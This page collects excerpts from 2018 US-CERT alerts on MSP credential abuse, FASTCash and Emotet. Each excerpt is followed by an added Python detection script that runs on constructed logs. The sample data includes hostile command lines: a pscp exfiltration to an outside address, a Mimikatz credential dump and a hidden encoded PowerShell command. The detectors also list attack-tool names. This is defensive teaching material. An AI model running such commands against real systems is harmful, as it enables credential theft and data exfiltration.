- Establishing written guidelines that prioritize incidents based on mission impact, so that an appropriate response can be initiated.
- Developing procedures and out-of-band lines of communication to handle incident reporting for internal and external relationships.
- Exercising incident response measures for various intrusion scenarios regularly, as part of a training regime.
- Committing to an effort that secures the endpoint and network infrastructure: prevention is less costly and more effective than reacting after an incident.

Mitigation

Manage Supply Chain Risk

MSP clients that do not conduct the majority of their own network defense should work with their MSP to determine what they can expect in terms of security. MSP clients should understand the supply chain risk associated with their MSP. Organizations should manage risk equally across their security, legal, and procurement groups. MSP clients should also refer to cloud security guidance from the National Institute of Standards and Technology to learn about MSP terms of service, architecture, security controls, and risks associated with cloud computing and data protection. [1] [2] [3]

Architecture

Restricting access to networks and systems is critical to containing an APT actor's movement. Provided below are key items that organizations should implement and periodically audit to ensure their network environment's physical and logical architecture limits an APT actor's visibility and access.

Virtual Private Network Connection Recommendations

Use a dedicated Virtual Private Network (VPN) for MSP connection... (more)
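The Technical Details section names the tools that make "living off the land" hard to block: Robocopy and PuTTY's pscp for moving staged data, and PowerSploit scripts under PowerShell. They cannot be blocked outright, but their command lines can be inspected. The following is an added example written for this page, not code from the alert: it runs a few rules over process-creation records (the shape of Windows event 4688 or Sysmon event 1 after field extraction). The records, the allowlist of file servers a customer expects bulk copies to land on, and the short list of PowerSploit cmdlet names are constructed assumptions.

```python
"""Flag living-off-the-land transfer and tooling patterns in process-creation
records. Added example on constructed data; not from the alert."""
import re
import shlex

# Hosts the customer expects bulk copies to land on (hypothetical allowlist).
TRUSTED_COPY_HOSTS = {"fs01", "fs02.corp.example"}
# A few cmdlet names from the public PowerSploit/PowerView modules (assumed
# starter list; extend from the repository's function names).
POWERSPLOIT_CMDLETS = ("Invoke-Mimikatz", "Invoke-Shellcode", "Get-Keystrokes", "Get-NetComputer")

# Constructed process-creation records: (user, command line).
SAMPLE_RECORDS = [
    ("CORP\\backupsvc", r"robocopy.exe D:\Backups \\FS01\backups$ /MIR /R:2"),
    ("CORP\\msp_admin", r"robocopy.exe C:\Shares\Engineering \\10.10.5.23\c$\temp\stage /E /R:1"),
    ("CORP\\msp_admin", r"pscp.exe -pw Passw0rd C:\Users\msp_admin\stage.7z ops@198.51.100.44:/tmp/"),
    ("CORP\\msp_admin", r"powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("CORP\\helpdesk", r"powershell.exe -File C:\Scripts\backup.ps1"),
    ("CORP\\msp_admin", r"powershell.exe -nop -c Invoke-Mimikatz -DumpCreds"),
]

UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")          # \\host\share\...  -> host
DRIVE_PATH = re.compile(r"^[A-Za-z]:\\")          # C:\... (a local path, not a remote)
SCP_TARGET = re.compile(r"^(?:[^@\s:]+@)?([A-Za-z0-9.\-]+):")  # [user@]host:path
# -e / -ec / -en / -enc / -EncodedCommand, as PowerShell accepts prefixes.
ENCODED_FLAG = re.compile(r"\s-e(c|n|nc|ncodedcommand)?\s")


def tokens(cmdline):
    """Split a Windows command line, keeping backslashes and dropping quotes."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def review(records):
    """Return (rule, user, detail) for each suspicious record."""
    findings = []
    for user, cmdline in records:
        toks = tokens(cmdline)
        exe = toks[0].rsplit("\\", 1)[-1].lower()
        if exe == "robocopy.exe" and len(toks) > 2:
            # robocopy <source> <destination> [...]: a UNC destination on a host
            # that is not a known file server is the staging pattern to look at.
            m = UNC_HOST.match(toks[2])
            if m and m.group(1).lower() not in TRUSTED_COPY_HOSTS:
                findings.append(("robocopy-to-untrusted-host", user, m.group(1)))
        elif exe in {"pscp.exe", "plink.exe", "scp.exe"}:
            for t in toks[1:]:
                if DRIVE_PATH.match(t):
                    continue
                m = SCP_TARGET.match(t)
                if m:
                    findings.append(("scp-to-remote-host", user, m.group(1)))
        elif exe in {"powershell.exe", "pwsh.exe"}:
            lowered = cmdline.lower()
            if ENCODED_FLAG.search(lowered):
                findings.append(("powershell-encoded-command", user, "-EncodedCommand"))
            for cmdlet in POWERSPLOIT_CMDLETS:
                if cmdlet.lower() in lowered:
                    findings.append(("powersploit-cmdlet", user, cmdlet))
    return findings


if __name__ == "__main__":
    for finding in review(SAMPLE_RECORDS):
        print(finding)
```

Every hit in the sample comes from the MSP-tier account, which is the point the alert makes about privileged provider credentials: the commands are all legitimate, so the signal is who runs them, where the data goes, and whether the PowerShell invocation is hidden behind an encoded payload.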

Posted on 3 October 2018 2:47 pm


TA18-276A: Using Rigorous Credential Control to Mitigate Trusted Network Exploitation

Original release date: October 03, 2018

Systems Affected

Network Systems

Overview

This technical alert addresses the exploitation of trusted network relationships and the subsequent illicit use of legitimate credentials by Advanced Persistent Threat (APT) actors. It identifies APT actors' tactics, techniques, and procedures (TTPs) and describes the best practices that could be employed to mitigate each of them. The mitigations for each TTP are arranged according to the National Institute of Standards and Technology (NIST) Cybersecurity Framework core functions of Protect, Detect, Respond, and Recover.

Description

APT actors are using multiple mechanisms to acquire legitimate user credentials to exploit trusted network relationships in order to expand unauthorized access, maintain persistence, and exfiltrate data from targeted organizations. Suggested best practices for administrators to mitigate this threat include auditing credentials and remote-access logs, and controlling privileged access and remote access.

Impact

APT actors are conducting malicious activity against organizations that have trusted network relationships with potential targets, such as a parent company, a connected partner, or a contracted managed service provider (MSP). APT actors can use legitimate credentials to expand unauthorized access, maintain persistence, exfiltrate data, and conduct other operations, while appearing to be authorized users. Leveraging legitimate credentials to exploit trusted network relationships also allows APT actors to access other devices and other trusted networks, which affords intrusions a high level of persistence and stealth.

Solution

Recommended best practices for mitigating this threat include rigorous credential and privileged-access management, as well as remote-access control, and audits of legitimate remote-access logs. While these measures aim to prevent the initial attack vectors and the spread of malicious activity, there is no single proven threat response. Using a defense-in-depth strategy is likely to increase the odds of successfully disrupting adversarial objectives long enough to allow network defenders to detect and respond before the successful completion of a threat actor's objectives.

Any organization that uses an MSP to provide services should monitor the MSP's interactions within their organization's enterprise networks, such as account use, privileges, and access to confidential or proprietary information. Organizations should also ensure that they have the ability to review their security and monitor their information hosted on MSP networks.

APT TTPs and Corresponding Mitigations

The following table displays the TTPs employed by APT actors and pairs them with mitigations that network defenders can implement.

Table 1: APT TTPs and Mitigations

Preparation
  APT TTPs:
  - Allocate operational infrastructure, such as Internet Protocol addresses (IPs).
  - Gather target credentials to use for legitimate access.
  Mitigations:
  - Protect: Educate users to never click unsolicited links or open unsolicited attachments in emails. Implement an awareness and training program.
  - Detect: Leverage multi-sourced threat-reputation services for files, Domain Name System (DNS), Uniform Resource Locators (URLs), IPs, and email addresses.

Engagement
  APT TTPs:
  - Use legitimate remote access, such as virtual private networks (VPNs) and Remote Desktop Protocol (RDP).
  - Leverage a trusted relationship between networks.
  Mitigations:
  - Protect: Enable strong spam filters to prevent phishing emails from reaching end users. Authenticate inbound email using Sender Policy Framework (SPF); Domain-based Message Authentication, Reporting and Conformance (DMARC); and DomainKeys Identified Mail (DKIM) to prevent email spoofing. Prevent external access via RDP sessions and require VPN access. Enforce multi-factor authentication and account-lockout policies to defend against brute force attacks.
  - Detect: Leverage multi-sourced threat-reputation services for files, DNS, URLs, IPs, and email addresses. Scan all incoming and outgoing emails to detect threats and filter out executables. Audit all remote authentications from trusted networks or service providers for anomalous activity.
  - Respond and Recover: Reset credentials, including system accounts. Transition to multi-factor authentication and reduce use of password-based systems, which are susceptible to credential theft, forgery, and reuse across multiple systems.

Presence
  APT TTPs:
  - Execution and Internal Reconnaissance: Write to disk and execute malware and tools on hosts. Use interpreted scripts and run commands in a shell to enumerate accounts, local network, operating system, software, and processes for internal reconnaissance. Map accessible networks and scan connected targets.
  - Lateral Movement: Use remote services and log on remotely. Use legitimate credentials to move laterally onto hosts, domain controllers, and servers. Write to remote file shares, such as Windows administrative shares.
  - Credential Access: Locate credentials, dump credentials, and crack passwords.
  Mitigations:
  - Protect: Deploy an anti-malware solution, which also aims to prevent spyware and adware. Prevent the execution of unauthorized software, such as Mimikatz, by using application whitelisting. Deploy PowerShell mitigations and, in the more current versions of PowerShell, enable monitoring and security features. Prevent unauthorized external access via RDP sessions. Restrict workstations from communicating directly with other workstations. Separate administrative privileges between internal administrator accounts and accounts used by trusted service providers. Enable detailed session-auditing and session-logging.
  - Detect: Audit all remote authentications from trusted networks or service providers. Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems. Log use of system administrator commands, such as net, ipconfig, and ping. Audit logs for suspicious behavior. Use whitelist or baseline comparison to monitor Windows event logs and network traffic to detect when a user maps a privileged administrative share on a Windows system. Leverage multi-sourced threat-reputation services for files, DNS, URLs, IPs, and email addresses.
  - Respond and Recover: Reset credentials. Monitor accounts associated with a compromise for abnormal behaviors, including unusual connections to nonstandard resources or attempts to elevate privileges, enumerate, or execute unexpected programs or applications... (more)
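Three of the Presence-phase detections in Table 1 (correlate credentials used on external-facing systems with internal activity, alert when a user maps an administrative share, and keep provider accounts separate from internal administrators) can be expressed as one correlation over authentication and share-access events. The following is an added example written for this page, not code from the alert. The events are constructed: "vpn_auth" stands in for a successful remote-access logon from outside, "share_access" for a share connection such as Windows event 5140, and the list of accounts allowed to touch ADMIN$/C$ is a hypothetical tiering list.

```python
"""Correlate remote authentications with administrative-share access.
Added example on constructed events; not from the alert."""
from collections import defaultdict
from datetime import datetime, timedelta

# Accounts permitted to map administrative shares (hypothetical tier-0 list).
INTERNAL_ADMINS = {"CORP\\t0_jsmith"}
# How long after an external logon an admin-share mapping is attributed to it.
VPN_TO_SHARE_WINDOW = timedelta(minutes=60)
ADMIN_SHARES = ("ADMIN$", "C$", "IPC$")
# Distinct hosts one account may map admin shares on within the analysed log
# (assumed to cover one day) before it counts as lateral-movement fan-out.
HOST_FANOUT_THRESHOLD = 3

# Constructed events, in arrival order.
SAMPLE_EVENTS = [
    {"ts": "2018-10-03T08:02:00", "type": "vpn_auth", "account": "CORP\\msp_svc", "src": "198.51.100.23"},
    {"ts": "2018-10-03T08:15:00", "type": "share_access", "account": "CORP\\msp_svc", "src": "10.20.0.15", "share": "\\\\DC01\\ADMIN$"},
    {"ts": "2018-10-03T08:16:30", "type": "share_access", "account": "CORP\\msp_svc", "src": "10.20.0.15", "share": "\\\\FS01\\C$"},
    {"ts": "2018-10-03T08:17:10", "type": "share_access", "account": "CORP\\msp_svc", "src": "10.20.0.15", "share": "\\\\APP02\\C$"},
    {"ts": "2018-10-03T09:40:00", "type": "share_access", "account": "CORP\\t0_jsmith", "src": "10.20.0.9", "share": "\\\\DC01\\ADMIN$"},
    {"ts": "2018-10-03T10:05:00", "type": "share_access", "account": "CORP\\alice", "src": "10.20.1.44", "share": "\\\\FS01\\Projects"},
]


def share_host_and_name(share):
    """'\\\\HOST\\NAME' -> ('HOST', 'NAME')."""
    host, name = share.strip("\\").split("\\", 1)
    return host, name


def correlate(events):
    """Return (rule, account, detail) findings over the event stream."""
    events = sorted(events, key=lambda e: e["ts"])
    last_external_logon = {}           # account -> time of latest vpn_auth
    hosts_by_account = defaultdict(set)
    findings = []
    for e in events:
        ts = datetime.fromisoformat(e["ts"])
        acct = e["account"]
        if e["type"] == "vpn_auth":
            last_external_logon[acct] = ts
            continue
        if e["type"] != "share_access":
            continue
        host, name = share_host_and_name(e["share"])
        if name.upper() not in ADMIN_SHARES:
            continue
        # Rule 1: only the internal admin tier should map admin shares.
        if acct not in INTERNAL_ADMINS:
            findings.append(("admin-share-by-non-admin", acct, host))
        # Rule 2: an external logon followed by admin-share use is the
        # "credentials used externally, then internally" mismatch.
        seen = last_external_logon.get(acct)
        if seen is not None and ts - seen <= VPN_TO_SHARE_WINDOW:
            findings.append(("admin-share-after-remote-logon", acct, host))
        # Rule 3: one account touching admin shares on many hosts.
        hosts_by_account[acct].add(host)
        if len(hosts_by_account[acct]) == HOST_FANOUT_THRESHOLD:
            findings.append(("admin-share-fanout", acct, str(HOST_FANOUT_THRESHOLD)))
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

The internal administrator's ADMIN$ mapping raises nothing, while the provider service account produces a finding on every host it touches and a fan-out alert on the third, which is the separation of privileges the table asks for, turned into a detection.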

Posted on 3 October 2018 2:00 pm


TA18-275A: HIDDEN COBRA – FASTCash Campaign

Original release date: October 02, 2018 | Last revised: December 21, 2018

Systems Affected

Retail Payment Systems

Overview

This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS), the Department of the Treasury (Treasury), and the Federal Bureau of Investigation (FBI). Working with U.S. government partners, DHS, Treasury, and FBI identified malware and other indicators of compromise (IOCs) used by the North Korean government in an Automated Teller Machine (ATM) cash-out scheme, referred to by the U.S. Government as "FASTCash." The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra .

FBI has high confidence that HIDDEN COBRA actors are using the IOCs listed in this report to maintain a presence on victims' networks to enable network exploitation. DHS, FBI, and Treasury are distributing these IOCs to enable network defense and reduce exposure to North Korean government malicious cyber activity. This TA also includes suggested response actions to the IOCs provided, recommended mitigation techniques, and information on reporting incidents. If users or administrators detect activity associated with the malware families associated with FASTCash, they should immediately flag it, report it to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give it the highest priority for enhanced mitigation.

NCCIC conducted analysis on 10 malware samples related to this activity and produced a Malware Analysis Report (MAR). MAR-10201537, HIDDEN COBRA FASTCash-Related Malware, examines the tactics, techniques, and procedures observed in the malware. Visit the MAR-10201537 page for the report and associated IOCs.

Description

Since at least late 2016, HIDDEN COBRA actors have used FASTCash tactics to target banks in Africa and Asia. At the time of this TA's publication, the U.S. Government has not confirmed any FASTCash incidents affecting institutions within the United States.

FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions. The U.S. Government assesses that HIDDEN COBRA actors will continue to use FASTCash tactics to target retail payment systems vulnerable to remote exploitation. According to a trusted partner's estimation, HIDDEN COBRA actors have stolen tens of millions of dollars. In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries.

HIDDEN COBRA actors target the retail payment system infrastructure within banks to enable fraudulent ATM cash withdrawals across national borders. HIDDEN COBRA actors have configured and deployed malware on compromised switch application servers in order to intercept and reply to financial request messages with fraudulent but legitimate-looking affirmative response messages. Although the infection vector is unknown, all of the compromised switch application servers were running unsupported IBM Advanced Interactive eXecutive (AIX) operating system versions beyond the end of their service pack support dates; there is no evidence HIDDEN COBRA actors successfully exploited the AIX operating system in these incidents. HIDDEN COBRA actors exploited the targeted systems by using their knowledge of ISO 8583, the International Organization for Standardization's standard for financial transaction messaging, and other tactics. HIDDEN COBRA actors most likely deployed ISO 8583 libraries on the targeted switch application servers. Malicious threat actors use these libraries to help interpret financial request messages and properly construct fraudulent financial response messages.

Figure 1: Anatomy of a FASTCash scheme

A review of log files showed HIDDEN COBRA actors making typos and actively correcting errors while configuring the targeted server for unauthorized activity. Based on analysis of the affected systems, analysts believe that malware, used by HIDDEN COBRA actors and explained in the Technical Details section below, inspected inbound financial request messages for specific primary account numbers (PANs). The malware generated fraudulent financial response messages only for the request messages that matched the expected PANs. Most accounts used to initiate the transactions had minimal account activity or zero balances. Analysts believe HIDDEN COBRA actors blocked transaction messages to stop denial messages from leaving the switch and used a GenerateResponse* function to approve the transactions. These response messages were likely sent for specific PANs matched using CheckPan() verification (see figure 1 for additional details on CheckPan()).

Technical Details

HIDDEN COBRA actors used malicious Windows executable applications, command-line utility applications, and other files in the FASTCash campaign to perform transactions and interact with financial systems, including the switch application server. The initial infection vector used to compromise victim networks is unknown; however, analysts surmise HIDDEN COBRA actors used spear-phishing emails in targeted attacks against bank employees. HIDDEN COBRA actors likely used Windows-based malware to explore a bank's network to identify the payment switch application server. Although these threat actors used different malware in each known incident, static analysis of malware samples indicates similarities in malware capabilities and functionalities. HIDDEN COBRA actors likely used legitimate credentials to move laterally through a bank's network and to illicitly access the switch application server. This pattern suggests compromised systems within a bank's network were used to access and compromise the targeted payment switch application server.

Upon successful compromise of a bank's payment switch application server, HIDDEN COBRA actors likely injected malicious code into legitimate processes, using command-line utility applications on the payment switch application server, to enable fraudulent behavior by the system in response to what would otherwise be normal payment switch application server activity. NCCIC collaborated with Symantec cybersecurity researchers to provide additional context on existing analysis [1]. Malware samples analyzed included malicious AIX executable files intended for a proprietary UNIX operating system developed by IBM. The AIX executable files were designed to inject malicious code into a currently running process... (more)
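The scheme above works because the switch, not the issuer's core system, is what answers the ATM: a 0200 request for a watched PAN is swallowed, and a 0210 response with an approval code is fabricated on the switch using an ISO 8583 library. The following is an added example written for this page, not code from the alert or from the malware analysis. It encodes and decodes a small subset of ISO 8583 data elements (PAN in DE2 as LLVAR, processing code DE3, amount DE4, STAN DE11, response code DE39, primary bitmap only), then reconciles the switch's outbound approvals against an authorization ledger held by the issuer's core banking system. The field subset, the ledger, the sample messages and the dormant-PAN list are assumptions; the check itself is the one a practitioner would want, because a response forged on the switch has no counterpart in a record the switch does not write.

```python
"""Minimal ISO 8583 encode/decode plus a reconciliation check that catches
approvals the switch emitted without a matching issuer decision.
Added example; field subset, ledger and sample traffic are assumptions."""

# Subset of ISO 8583 data elements used here: (format, length).
# LLVAR = two-digit length prefix, FIXED = fixed width.
FIELD_SPECS = {
    2: ("LLVAR", 19),   # primary account number (PAN)
    3: ("FIXED", 6),    # processing code
    4: ("FIXED", 12),   # transaction amount
    11: ("FIXED", 6),   # system trace audit number (STAN)
    39: ("FIXED", 2),   # response code; "00" = approved
}


def encode_bitmap(field_numbers):
    """Primary bitmap: bit n (1 = leftmost) is set when element n is present."""
    bits = 0
    for n in field_numbers:
        if not 2 <= n <= 64:
            raise ValueError("only primary-bitmap elements are supported here")
        bits |= 1 << (64 - n)
    return f"{bits:016X}"


def decode_bitmap(hex16):
    bits = int(hex16, 16)
    return [n for n in range(1, 65) if (bits >> (64 - n)) & 1]


def encode(mti, fields):
    """Build MTI + primary bitmap + elements in ascending order."""
    body = ""
    for n in sorted(fields):
        fmt, size = FIELD_SPECS[n]
        value = str(fields[n])
        if fmt == "LLVAR":
            if len(value) > size:
                raise ValueError(f"DE{n} longer than {size}")
            body += f"{len(value):02d}{value}"
        else:
            if len(value) != size:
                raise ValueError(f"DE{n} must be exactly {size} characters")
            body += value
    return mti + encode_bitmap(fields) + body


def decode(message):
    mti, bitmap, body = message[:4], message[4:20], message[20:]
    fields, pos = {}, 0
    for n in decode_bitmap(bitmap):
        if n == 1:
            raise ValueError("secondary bitmap not supported in this example")
        fmt, size = FIELD_SPECS[n]
        if fmt == "LLVAR":
            length = int(body[pos:pos + 2])
            pos += 2
            fields[n] = body[pos:pos + length]
            pos += length
        else:
            fields[n] = body[pos:pos + size]
            pos += size
    return mti, fields


# Constructed traffic: 0210 responses the switch sent back toward the ATMs.
SWITCH_RESPONSES = [
    encode("0210", {2: "4111111111111111", 3: "010000", 4: "000000050000", 11: "000101", 39: "00"}),
    encode("0210", {2: "5555555555554444", 3: "010000", 4: "000000002000", 11: "000102", 39: "00"}),
    encode("0210", {2: "4000000000000002", 3: "010000", 4: "000000090000", 11: "000103", 39: "00"}),
]
# Constructed issuer-side ledger: (STAN, PAN) -> decision the core banking
# system actually recorded. A reply forged on the switch has no entry here,
# or contradicts the one that exists.
ISSUER_LEDGER = {
    ("000101", "4111111111111111"): "05",
    ("000102", "5555555555554444"): "00",
}
# Accounts the bank considers dormant or zero-balance (assumption).
DORMANT_PANS = {"4111111111111111"}


def reconcile(responses, ledger, dormant_pans):
    """Return {STAN: [reasons]} for approvals the issuer never granted."""
    suspicious = {}
    for raw in responses:
        mti, f = decode(raw)
        if mti != "0210" or f.get(39) != "00":
            continue
        reasons = []
        decision = ledger.get((f[11], f[2]))
        if decision is None:
            reasons.append("no issuer decision")
        elif decision != "00":
            reasons.append(f"issuer declined ({decision})")
        if f[2] in dormant_pans:
            reasons.append("dormant PAN")
        if reasons:
            suspicious[f[11]] = reasons
    return suspicious


if __name__ == "__main__":
    print(reconcile(SWITCH_RESPONSES, ISSUER_LEDGER, DORMANT_PANS))
```

STAN 000101 is the FASTCash shape: the issuer declined (or, in the real incidents, never saw the request because the switch dropped it), the switch approved anyway, and the card belongs to an account with no activity. The reconciliation must read the ledger from the core system, not from the switch's own logs, which the actors were observed editing.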

Posted on 2 October 2018 6:45 pm


TA18-201A: Emotet Malware

Original release date: July 20, 2018

Systems Affected

Network Systems

Overview

Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors. This joint Technical Alert (TA) is the result of Multi-State Information Sharing & Analysis Center (MS-ISAC) analytic efforts, in coordination with the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC).

Description

Emotet continues to be among the most costly and destructive malware affecting SLTT governments. Its worm-like features result in rapidly spreading network-wide infections, which are difficult to combat. Emotet infections have cost SLTT governments up to $1 million per incident to remediate.

Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. It uses modular Dynamic Link Libraries (DLLs) to continuously evolve and update its capabilities. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment.

Emotet is disseminated through malspam (emails containing malicious attachments or links) that uses branding familiar to the recipient; it has even been spread using the MS-ISAC name. As of July 2018, the most recent campaigns imitate PayPal receipts, shipping notifications, or "past-due" invoices purportedly from MS-ISAC. Initial infection occurs when a user opens or clicks the malicious download link, PDF, or macro-enabled Microsoft Word document included in the malspam. Once downloaded, Emotet establishes persistence and attempts to propagate across the local network through incorporated spreader modules.

Figure 1: Malicious email distributing Emotet

Currently, Emotet uses five known spreader modules: NetPass.exe, WebBrowserPassView, Mail PassView, Outlook scraper, and a credential enumerator.
- NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives.
- Outlook scraper is a tool that scrapes names and email addresses from the victim's Outlook accounts and uses that information to send out additional phishing emails from the compromised accounts.
- WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module.
- Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module.
- Credential enumerator is a self-extracting RAR file containing two components: a bypass component and a service component. The bypass component is used for the enumeration of network resources and either finds writable share drives using Server Message Block (SMB) or tries to brute force user accounts, including the administrator account. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet's access to SMB can result in the infection of entire domains (servers and clients).

Figure 2: Emotet infection process

To maintain persistence, Emotet injects code into explorer.exe and other running processes. It can also collect sensitive information, including system name, location, and operating system version, and connects to a remote command and control (C2) server, usually through a generated 16-letter domain name that ends in ".eu". Once Emotet establishes a connection with the C2, it reports a new infection, receives configuration data, downloads and runs files, receives instructions, and uploads data to the C2 server.

Emotet artifacts are typically found in arbitrary paths located off of the AppData\Local and AppData\Roaming directories. The artifacts usually mimic the names of known executables. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly-named files in the system root directories that are run as Windows services. When executed, these services attempt to propagate the malware to adjacent systems via accessible administrative shares.

Note: it is essential that privileged accounts are not used to log in to compromised systems during remediation, as this may accelerate the spread of the malware.

Example Filenames and Paths:
C:\Users\<username>\AppData\Local\Microsoft\Windows\shedaudio.exe
C:\Users\<username>\AppData\Roaming\Macromedia\Flash Player\macromedia\bin\flashplayer.exe

Typical Registry Keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

System Root Directories:
C:\Windows\11987416.exe
C:\Windows\System32\46615275.exe
C:\Windows\System32\shedaudio.exe
C:\Windows\SysWOW64\f9jwqSbS.exe

Impact

Negative consequences of Emotet infection include temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses incurred to restore systems and files, and potential harm to an organization's reputation.

Solution

NCCIC and MS-ISAC recommend that organizations adhere to the following general best practices to limit the effect of Emotet and similar malspam:
- Use Group Policy Object to set a Windows Firewall rule to restrict inbound SMB communication between client systems. If using an alternative host-based intrusion prevention system (HIPS), consider implementing custom modifications for the control of client-to-client SMB communication. At a minimum, create a Group Policy Object that restricts inbound SMB connections to clients originating from clients.
- Use antivirus programs, with automatic updates of signatures and software, on clients and servers.
- Apply appropriate patches and updates immediately (after appropriate testing).
- Implement filters at the email gateway to filter out emails with known malspam indicators, such as known malicious subject lines, and block suspicious IP addresses at the firewall... (more)
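The artifacts listed above (a generated 16-letter .eu C2 domain, random-named executables dropped directly in the system root directories, and Run-key persistence that points back into the user's AppData tree) are all visible in ordinary endpoint telemetry. The following is an added example written for this page, not code from the alert: it applies those three rules to constructed log lines in a Sysmon-like key=value shape (event 22 DNS query, event 11 file create, event 13 registry value set). The eight-character name rule is a triage heuristic that will also match a handful of legitimate binaries, so it carries a small allowlist to be extended per estate.

```python
"""Triage endpoint telemetry for the Emotet artifacts described above.
Added example; the log lines are constructed, in a Sysmon-like layout."""
import re

SAMPLE_LOG = r"""
2018-07-20T10:14:55|EventID=1|Image=C:\Windows\System32\svchost.exe|CommandLine=svchost.exe -k netsvcs
2018-07-20T10:15:02|EventID=22|Image=C:\Users\bob\AppData\Local\Microsoft\Windows\shedaudio.exe|QueryName=qpzmwoxneibrvuty.eu
2018-07-20T10:15:03|EventID=22|Image=C:\Program Files\Mozilla Firefox\firefox.exe|QueryName=www.example.eu
2018-07-20T10:15:40|EventID=11|Image=C:\Users\bob\AppData\Local\Microsoft\Windows\shedaudio.exe|TargetFilename=C:\Windows\System32\46615275.exe
2018-07-20T10:15:41|EventID=11|Image=C:\Users\bob\AppData\Local\Microsoft\Windows\shedaudio.exe|TargetFilename=C:\Windows\SysWOW64\f9jwqSbS.exe
2018-07-20T10:15:42|EventID=11|Image=C:\Windows\System32\msiexec.exe|Target
Filename=C:\Windows\System32\drivers\etc\hosts.bak
2018-07-20T10:16:00|EventID=13|Image=C:\Users\bob\AppData\Local\Microsoft\Windows\shedaudio.exe|TargetObject=HKLM\Software\Microsoft\Windows\CurrentVersion\Run\shedaudio|Details=C:\Users\bob\AppData\Local\Microsoft\Windows\shedaudio.exe
2018-07-20T10:16:05|EventID=13|Image=C:\Windows\System32\msiexec.exe|TargetObject=HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth|Details=C:\Windows\System32\SecurityHealthSystray.exe
""".replace("Target\nFilename", "TargetFilename")

# Rule 1: algorithmically generated C2 name, 16 letters under .eu.
DGA_EU = re.compile(r"^[a-z]{16}\.eu$", re.I)
# Rule 2: new eight-character alphanumeric .exe directly in a system root.
SYSTEM_ROOTS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
RANDOM_EXE = re.compile(r"^[0-9a-z]{8}\.exe$", re.I)
KNOWN_GOOD = {"winlogon.exe", "services.exe", "explorer.exe"}   # baseline; extend per estate
# Rule 3: Run-key value whose target lives under a user's AppData tree.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
USER_PROFILE_EXE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\.*\.exe$", re.I)


def parse_line(line):
    """'ts|k=v|k=v' -> dict; values may contain spaces but not '|'."""
    ts, *pairs = line.split("|")
    record = {"ts": ts}
    for pair in pairs:
        key, _, value = pair.partition("=")
        record[key] = value
    return record


def triage(log_text):
    """Return (rule, image, detail) for every line matching one of the rules."""
    findings = []
    for line in log_text.strip().splitlines():
        r = parse_line(line)
        eid = r.get("EventID")
        if eid == "22" and DGA_EU.match(r.get("QueryName", "")):
            findings.append(("dga-eu-domain", r["Image"], r["QueryName"]))
        elif eid == "11":
            path = r.get("TargetFilename", "")
            folder, _, name = path.rpartition("\\")
            if (folder.lower() in SYSTEM_ROOTS and RANDOM_EXE.match(name)
                    and name.lower() not in KNOWN_GOOD):
                findings.append(("random-exe-in-system-root", r["Image"], path))
        elif eid == "13":
            if RUN_KEY.search(r.get("TargetObject", "")) and USER_PROFILE_EXE.match(r.get("Details", "")):
                findings.append(("run-key-to-appdata", r["Image"], r["Details"]))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Reading the three hits together is what matters: the same AppData-resident image resolves the generated domain, drops the random-named services into System32 and SysWOW64, and registers itself under Run. The pivot for incident response is that image path, not any single file name, because the names change from one build to the next.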

Posted on 21 July 2018 12:24 am


TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm

